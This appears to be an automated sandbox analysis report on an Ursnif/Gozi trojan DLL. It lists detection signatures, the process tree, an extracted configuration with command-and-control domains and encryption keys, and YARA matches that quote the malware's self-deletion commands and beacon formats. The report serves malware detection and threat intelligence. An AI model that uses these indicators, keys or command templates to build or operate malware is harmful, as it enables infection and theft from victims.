Edit tour

Windows Analysis Report
ursnif_IAT_corrected.exe.dll

Overview

General Information

Sample Name:	ursnif_IAT_corrected.exe.dll
Analysis ID:	727158
MD5:	8b52c277c63c5877c0e4ca32d1458957
SHA1:	1d64f4610c6e0af8a3e3a9d8e8b794fc1bebeef5
SHA256:	8d2f90927603c33947463dc9846dc1b7a220ea1f13dc1a0ccfe538d5f83bbfe2
Tags:	dllursnif
Infos:

Detection

Ursnif

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Malicious sample detected (through community Yara rule)

Yara detected Ursnif

Antivirus / Scanner detection for submitted sample

System process connects to network (likely due to code injection or exploit)

Multi AV Scanner detection for domain / URL

Snort IDS alert for network traffic

Writes or reads registry keys via WMI

Found API chain indicative of debugger detection

Machine Learning detection for sample

Found evasive API chain (may stop execution after checking system information)

Writes registry values via WMI

Uses 32bit PE files

Yara signature match

Contains functionality to query locales information (e.g. system language)

Uses code obfuscation techniques (call, push, ret)

Internet Provider seen in connection with other malware

Detected potential crypto function

Contains functionality to query CPU information (cpuid)

Sample execution stops while process was sleeping (likely an evasion)

Contains functionality to call native functions

Contains functionality to dynamically determine API calls

Tries to load missing DLLs

Uses a known web browser user agent for HTTP communication

Found evasive API chain checking for process token information

Registers a DLL

Uses Microsoft's Enhanced Cryptographic Provider

Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

System is w10x64

loaddll32.exe (PID: 4124 cmdline: loaddll32.exe "C:\Users\user\Desktop\ursnif_IAT_corrected.exe.dll" MD5: 1F562FBF37040EC6C43C8D5EF619EA39)

conhost.exe (PID: 5520 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cmd.exe (PID: 5080 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\ursnif_IAT_corrected.exe.dll",#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)

rundll32.exe (PID: 5020 cmdline: rundll32.exe "C:\Users\user\Desktop\ursnif_IAT_corrected.exe.dll",#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

regsvr32.exe (PID: 5216 cmdline: regsvr32.exe /s C:\Users\user\Desktop\ursnif_IAT_corrected.exe.dll MD5: 426E7499F6A7346F0410DEAD0805586B)

rundll32.exe (PID: 780 cmdline: rundll32.exe C:\Users\user\Desktop\ursnif_IAT_corrected.exe.dll,DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

cleanup

Malware Configuration

Threatname: Ursnif

{"RSA Public Key": "oZWPUqrPbA1nh5KeblvW58CGuN1e4qDR3J71aATar5O00raqKE8xUkhFQUaw8R0BlZUnpL1tyzW+efqFkhCLYWrMw9nZJeYEd473/0tPEq2VGwv1oB9Pv2/fdgDd6u50PW0dH+R3uMkcvvSQWa4B8bKoi7inCm10C8UL7vaPiLpNIvtqiX4DmnU8XJVFUqOUDuOPHQVcBCPrZcWDAnVXnLWrHhRfXLI5WYFsVRJSde33pVRkM7XdYHtOhkTQlmghQJYxytxJ0sf95vDL6iv7epWQHBvzkG4uQNqLKhs25dvCXYJYNvjJXuqOqa9OkYezI8hW7hiiyxvLszulw2SxcIP0Ki+iShbrMtTsnnUoNQ4=", "c2_domain": ["config.edge.skype.com", "onlinetwork.top", "linetwork.top"], "botnet": "5000", "server": "50", "serpent_key": "7Lmoq8QMk7P7gY63", "sleep_time": "1", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "0"}

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
ursnif_IAT_corrected.exe.dll	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000004.00000003.347389084.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000004.00000003.347389084.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Gozi_fd494041	unknown	unknown	0xff0:$a1: /C ping localhost -n %u && del "%s" 0xf20:$a2: /C "copy "%s" "%s" /y && "%s" "%s" 0xec8:$a3: /C "copy "%s" "%s" /y && rundll32 "%s",%S" 0xca8:$a5: filename="%.4u.%lu" 0x803:$a7: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0x63a:$a8: %08X-%04X-%04X-%04X-%08X%04X 0xa41:$a8: %08X-%04X-%04X-%04X-%08X%04X 0xe72:$a9: &whoami=%s 0xe5a:$a10: %u.%u_%u_%u_x%u 0xc22:$a11: size=%u&hash=0x%08x 0xc13:$a12: &uptime=%u 0xda7:$a13: %systemroot%\system32\c_1252.nls 0x1416:$a14: IE10RunOnceLastShown_TIMESTAMP
00000004.00000003.347389084.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Gozi_261f5ac5	unknown	unknown	0xbd3:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x803:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0xc74:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu" 0xafa:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s) 0xd4b:$a9: Software\AppDataLow\Software\Microsoft\ 0x1c68:$a9: Software\AppDataLow\Software\Microsoft\
00000003.00000003.354187401.0000000004F88000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000003.00000003.354187401.0000000004F88000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Gozi_fd494041	unknown	unknown	0xff0:$a1: /C ping localhost -n %u && del "%s" 0xf20:$a2: /C "copy "%s" "%s" /y && "%s" "%s" 0xec8:$a3: /C "copy "%s" "%s" /y && rundll32 "%s",%S" 0xca8:$a5: filename="%.4u.%lu" 0x803:$a7: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0x63a:$a8: %08X-%04X-%04X-%04X-%08X%04X 0xa41:$a8: %08X-%04X-%04X-%04X-%08X%04X 0xe72:$a9: &whoami=%s 0xe5a:$a10: %u.%u_%u_%u_x%u 0xc22:$a11: size=%u&hash=0x%08x 0xc13:$a12: &uptime=%u 0xda7:$a13: %systemroot%\system32\c_1252.nls 0x1416:$a14: IE10RunOnceLastShown_TIMESTAMP
00000003.00000003.354187401.0000000004F88000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Gozi_261f5ac5	unknown	unknown	0xbd3:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x803:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0xc74:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu" 0xafa:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s) 0xd4b:$a9: Software\AppDataLow\Software\Microsoft\ 0x1c68:$a9: Software\AppDataLow\Software\Microsoft\
00000005.00000003.322255740.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000005.00000003.322255740.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Gozi_fd494041	unknown	unknown	0xff0:$a1: /C ping localhost -n %u && del "%s" 0xf20:$a2: /C "copy "%s" "%s" /y && "%s" "%s" 0xec8:$a3: /C "copy "%s" "%s" /y && rundll32 "%s",%S" 0xca8:$a5: filename="%.4u.%lu" 0x803:$a7: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0x63a:$a8: %08X-%04X-%04X-%04X-%08X%04X 0xa41:$a8: %08X-%04X-%04X-%04X-%08X%04X 0xe72:$a9: &whoami=%s 0xe5a:$a10: %u.%u_%u_%u_x%u 0xc22:$a11: size=%u&hash=0x%08x 0xc13:$a12: &uptime=%u 0xda7:$a13: %systemroot%\system32\c_1252.nls 0x1416:$a14: IE10RunOnceLastShown_TIMESTAMP
00000005.00000003.322255740.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Gozi_261f5ac5	unknown	unknown	0xbd3:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x803:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0xc74:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu" 0xafa:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s) 0xd4b:$a9: Software\AppDataLow\Software\Microsoft\ 0x1c68:$a9: Software\AppDataLow\Software\Microsoft\
00000000.00000002.817394092.0000000001379000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
00000005.00000003.322346163.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000005.00000003.322346163.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Gozi_fd494041	unknown	unknown	0xff0:$a1: /C ping localhost -n %u && del "%s" 0xf20:$a2: /C "copy "%s" "%s" /y && "%s" "%s" 0xec8:$a3: /C "copy "%s" "%s" /y && rundll32 "%s",%S" 0xca8:$a5: filename="%.4u.%lu" 0x803:$a7: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0x63a:$a8: %08X-%04X-%04X-%04X-%08X%04X 0xa41:$a8: %08X-%04X-%04X-%04X-%08X%04X 0xe72:$a9: &whoami=%s 0xe5a:$a10: %u.%u_%u_%u_x%u 0xc22:$a11: size=%u&hash=0x%08x 0xc13:$a12: &uptime=%u 0xda7:$a13: %systemroot%\system32\c_1252.nls 0x1416:$a14: IE10RunOnceLastShown_TIMESTAMP
00000005.00000003.322346163.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Gozi_261f5ac5	unknown	unknown	0xbd3:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x803:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0xc74:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu" 0xafa:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s) 0xd4b:$a9: Software\AppDataLow\Software\Microsoft\ 0x1c68:$a9: Software\AppDataLow\Software\Microsoft\
00000004.00000003.347438026.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000004.00000003.347438026.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Gozi_fd494041	unknown	unknown	0xff0:$a1: /C ping localhost -n %u && del "%s" 0xf20:$a2: /C "copy "%s" "%s" /y && "%s" "%s" 0xec8:$a3: /C "copy "%s" "%s" /y && rundll32 "%s",%S" 0xca8:$a5: filename="%.4u.%lu" 0x803:$a7: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0x63a:$a8: %08X-%04X-%04X-%04X-%08X%04X 0xa41:$a8: %08X-%04X-%04X-%04X-%08X%04X 0xe72:$a9: &whoami=%s 0xe5a:$a10: %u.%u_%u_%u_x%u 0xc22:$a11: size=%u&hash=0x%08x 0xc13:$a12: &uptime=%u 0xda7:$a13: %systemroot%\system32\c_1252.nls 0x1416:$a14: IE10RunOnceLastShown_TIMESTAMP
00000004.00000003.347438026.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Gozi_261f5ac5	unknown	unknown	0xbd3:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x803:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0xc74:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu" 0xafa:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s) 0xd4b:$a9: Software\AppDataLow\Software\Microsoft\ 0x1c68:$a9: Software\AppDataLow\Software\Microsoft\
00000004.00000003.347208366.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000004.00000003.347208366.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Gozi_fd494041	unknown	unknown	0xff0:$a1: /C ping localhost -n %u && del "%s" 0xf20:$a2: /C "copy "%s" "%s" /y && "%s" "%s" 0xec8:$a3: /C "copy "%s" "%s" /y && rundll32 "%s",%S" 0xca8:$a5: filename="%.4u.%lu" 0x803:$a7: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0x63a:$a8: %08X-%04X-%04X-%04X-%08X%04X 0xa41:$a8: %08X-%04X-%04X-%04X-%08X%04X 0xe72:$a9: &whoami=%s 0xe5a:$a10: %u.%u_%u_%u_x%u 0xc22:$a11: size=%u&hash=0x%08x 0xc13:$a12: &uptime=%u 0xda7:$a13: %systemroot%\system32\c_1252.nls 0x1416:$a14: IE10RunOnceLastShown_TIMESTAMP
00000004.00000003.347208366.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Gozi_261f5ac5	unknown	unknown	0xbd3:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x803:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0xc74:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu" 0xafa:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s) 0xd4b:$a9: Software\AppDataLow\Software\Microsoft\ 0x1c68:$a9: Software\AppDataLow\Software\Microsoft\
00000005.00000003.322130590.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000005.00000003.322130590.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Gozi_fd494041	unknown	unknown	0xff0:$a1: /C ping localhost -n %u && del "%s" 0xf20:$a2: /C "copy "%s" "%s" /y && "%s" "%s" 0xec8:$a3: /C "copy "%s" "%s" /y && rundll32 "%s",%S" 0xca8:$a5: filename="%.4u.%lu" 0x803:$a7: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0x63a:$a8: %08X-%04X-%04X-%04X-%08X%04X 0xa41:$a8: %08X-%04X-%04X-%04X-%08X%04X 0xe72:$a9: &whoami=%s 0xe5a:$a10: %u.%u_%u_%u_x%u 0xc22:$a11: size=%u&hash=0x%08x 0xc13:$a12: &uptime=%u 0xda7:$a13: %systemroot%\system32\c_1252.nls 0x1416:$a14: IE10RunOnceLastShown_TIMESTAMP
00000005.00000003.322130590.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Gozi_261f5ac5	unknown	unknown	0xbd3:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x803:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0xc74:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu" 0xafa:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s) 0xd4b:$a9: Software\AppDataLow\Software\Microsoft\ 0x1c68:$a9: Software\AppDataLow\Software\Microsoft\
00000000.00000003.343566603.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.343566603.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Gozi_fd494041	unknown	unknown	0xff0:$a1: /C ping localhost -n %u && del "%s" 0xf20:$a2: /C "copy "%s" "%s" /y && "%s" "%s" 0xec8:$a3: /C "copy "%s" "%s" /y && rundll32 "%s",%S" 0xca8:$a5: filename="%.4u.%lu" 0x803:$a7: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0x63a:$a8: %08X-%04X-%04X-%04X-%08X%04X 0xa41:$a8: %08X-%04X-%04X-%04X-%08X%04X 0xe72:$a9: &whoami=%s 0xe5a:$a10: %u.%u_%u_%u_x%u 0xc22:$a11: size=%u&hash=0x%08x 0xc13:$a12: &uptime=%u 0xda7:$a13: %systemroot%\system32\c_1252.nls 0x1416:$a14: IE10RunOnceLastShown_TIMESTAMP
00000000.00000003.343566603.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Gozi_261f5ac5	unknown	unknown	0xbd3:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x803:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0xc74:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu" 0xafa:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s) 0xd4b:$a9: Software\AppDataLow\Software\Microsoft\ 0x1c68:$a9: Software\AppDataLow\Software\Microsoft\
00000000.00000003.343497649.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.343497649.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Gozi_fd494041	unknown	unknown	0xff0:$a1: /C ping localhost -n %u && del "%s" 0xf20:$a2: /C "copy "%s" "%s" /y && "%s" "%s" 0xec8:$a3: /C "copy "%s" "%s" /y && rundll32 "%s",%S" 0xca8:$a5: filename="%.4u.%lu" 0x803:$a7: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0x63a:$a8: %08X-%04X-%04X-%04X-%08X%04X 0xa41:$a8: %08X-%04X-%04X-%04X-%08X%04X 0xe72:$a9: &whoami=%s 0xe5a:$a10: %u.%u_%u_%u_x%u 0xc22:$a11: size=%u&hash=0x%08x 0xc13:$a12: &uptime=%u 0xda7:$a13: %systemroot%\system32\c_1252.nls 0x1416:$a14: IE10RunOnceLastShown_TIMESTAMP
00000000.00000003.343497649.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Gozi_261f5ac5	unknown	unknown	0xbd3:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x803:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0xc74:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu" 0xafa:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s) 0xd4b:$a9: Software\AppDataLow\Software\Microsoft\ 0x1c68:$a9: Software\AppDataLow\Software\Microsoft\
00000004.00000003.347419865.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000004.00000003.347419865.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Gozi_fd494041	unknown	unknown	0xff0:$a1: /C ping localhost -n %u && del "%s" 0xf20:$a2: /C "copy "%s" "%s" /y && "%s" "%s" 0xec8:$a3: /C "copy "%s" "%s" /y && rundll32 "%s",%S" 0xca8:$a5: filename="%.4u.%lu" 0x803:$a7: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0x63a:$a8: %08X-%04X-%04X-%04X-%08X%04X 0xa41:$a8: %08X-%04X-%04X-%04X-%08X%04X 0xe72:$a9: &whoami=%s 0xe5a:$a10: %u.%u_%u_%u_x%u 0xc22:$a11: size=%u&hash=0x%08x 0xc13:$a12: &uptime=%u 0xda7:$a13: %systemroot%\system32\c_1252.nls 0x1416:$a14: IE10RunOnceLastShown_TIMESTAMP
00000004.00000003.347419865.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Gozi_261f5ac5	unknown	unknown	0xbd3:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x803:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0xc74:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu" 0xafa:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s) 0xd4b:$a9: Software\AppDataLow\Software\Microsoft\ 0x1c68:$a9: Software\AppDataLow\Software\Microsoft\
00000005.00000002.817370838.0000000004B09000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
00000005.00000003.322318617.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000005.00000003.322318617.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Gozi_fd494041	unknown	unknown	0xff0:$a1: /C ping localhost -n %u && del "%s" 0xf20:$a2: /C "copy "%s" "%s" /y && "%s" "%s" 0xec8:$a3: /C "copy "%s" "%s" /y && rundll32 "%s",%S" 0xca8:$a5: filename="%.4u.%lu" 0x803:$a7: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0x63a:$a8: %08X-%04X-%04X-%04X-%08X%04X 0xa41:$a8: %08X-%04X-%04X-%04X-%08X%04X 0xe72:$a9: &whoami=%s 0xe5a:$a10: %u.%u_%u_%u_x%u 0xc22:$a11: size=%u&hash=0x%08x 0xc13:$a12: &uptime=%u 0xda7:$a13: %systemroot%\system32\c_1252.nls 0x1416:$a14: IE10RunOnceLastShown_TIMESTAMP
00000005.00000003.322318617.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Gozi_261f5ac5	unknown	unknown	0xbd3:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x803:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0xc74:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu" 0xafa:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s) 0xd4b:$a9: Software\AppDataLow\Software\Microsoft\ 0x1c68:$a9: Software\AppDataLow\Software\Microsoft\
00000000.00000003.343438473.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.343438473.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Gozi_fd494041	unknown	unknown	0xff0:$a1: /C ping localhost -n %u && del "%s" 0xf20:$a2: /C "copy "%s" "%s" /y && "%s" "%s" 0xec8:$a3: /C "copy "%s" "%s" /y && rundll32 "%s",%S" 0xca8:$a5: filename="%.4u.%lu" 0x803:$a7: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0x63a:$a8: %08X-%04X-%04X-%04X-%08X%04X 0xa41:$a8: %08X-%04X-%04X-%04X-%08X%04X 0xe72:$a9: &whoami=%s 0xe5a:$a10: %u.%u_%u_%u_x%u 0xc22:$a11: size=%u&hash=0x%08x 0xc13:$a12: &uptime=%u 0xda7:$a13: %systemroot%\system32\c_1252.nls 0x1416:$a14: IE10RunOnceLastShown_TIMESTAMP
00000000.00000003.343438473.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Gozi_261f5ac5	unknown	unknown	0xbd3:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x803:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0xc74:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu" 0xafa:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s) 0xd4b:$a9: Software\AppDataLow\Software\Microsoft\ 0x1c68:$a9: Software\AppDataLow\Software\Microsoft\
00000003.00000003.354124347.0000000004F88000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000003.00000003.354124347.0000000004F88000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Gozi_fd494041	unknown	unknown	0xff0:$a1: /C ping localhost -n %u && del "%s" 0xf20:$a2: /C "copy "%s" "%s" /y && "%s" "%s" 0xec8:$a3: /C "copy "%s" "%s" /y && rundll32 "%s",%S" 0xca8:$a5: filename="%.4u.%lu" 0x803:$a7: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0x63a:$a8: %08X-%04X-%04X-%04X-%08X%04X 0xa41:$a8: %08X-%04X-%04X-%04X-%08X%04X 0xe72:$a9: &whoami=%s 0xe5a:$a10: %u.%u_%u_%u_x%u 0xc22:$a11: size=%u&hash=0x%08x 0xc13:$a12: &uptime=%u 0xda7:$a13: %systemroot%\system32\c_1252.nls 0x1416:$a14: IE10RunOnceLastShown_TIMESTAMP
00000003.00000003.354124347.0000000004F88000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Gozi_261f5ac5	unknown	unknown	0xbd3:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x803:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0xc74:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu" 0xafa:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s) 0xd4b:$a9: Software\AppDataLow\Software\Microsoft\ 0x1c68:$a9: Software\AppDataLow\Software\Microsoft\
00000003.00000003.353972705.0000000004F88000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000003.00000003.353972705.0000000004F88000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Gozi_fd494041	unknown	unknown	0xff0:$a1: /C ping localhost -n %u && del "%s" 0xf20:$a2: /C "copy "%s" "%s" /y && "%s" "%s" 0xec8:$a3: /C "copy "%s" "%s" /y && rundll32 "%s",%S" 0xca8:$a5: filename="%.4u.%lu" 0x803:$a7: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0x63a:$a8: %08X-%04X-%04X-%04X-%08X%04X 0xa41:$a8: %08X-%04X-%04X-%04X-%08X%04X 0xe72:$a9: &whoami=%s 0xe5a:$a10: %u.%u_%u_%u_x%u 0xc22:$a11: size=%u&hash=0x%08x 0xc13:$a12: &uptime=%u 0xda7:$a13: %systemroot%\system32\c_1252.nls 0x1416:$a14: IE10RunOnceLastShown_TIMESTAMP
00000003.00000003.353972705.0000000004F88000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Gozi_261f5ac5	unknown	unknown	0xbd3:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x803:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0xc74:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu" 0xafa:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s) 0xd4b:$a9: Software\AppDataLow\Software\Microsoft\ 0x1c68:$a9: Software\AppDataLow\Software\Microsoft\
00000004.00000003.347302093.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000004.00000003.347302093.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Gozi_fd494041	unknown	unknown	0xff0:$a1: /C ping localhost -n %u && del "%s" 0xf20:$a2: /C "copy "%s" "%s" /y && "%s" "%s" 0xec8:$a3: /C "copy "%s" "%s" /y && rundll32 "%s",%S" 0xca8:$a5: filename="%.4u.%lu" 0x803:$a7: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0x63a:$a8: %08X-%04X-%04X-%04X-%08X%04X 0xa41:$a8: %08X-%04X-%04X-%04X-%08X%04X 0xe72:$a9: &whoami=%s 0xe5a:$a10: %u.%u_%u_%u_x%u 0xc22:$a11: size=%u&hash=0x%08x 0xc13:$a12: &uptime=%u 0xda7:$a13: %systemroot%\system32\c_1252.nls 0x1416:$a14: IE10RunOnceLastShown_TIMESTAMP
00000004.00000003.347302093.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Gozi_261f5ac5	unknown	unknown	0xbd3:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x 0x803:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s 0xc74:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu" 0xafa:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s) 0xd4b:$a9: Software\AppDataLow\Software\Microsoft\ 0x1c68:$a9: Software\AppDataLow\Software\Microsoft\
00000000.00000002.817516370.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
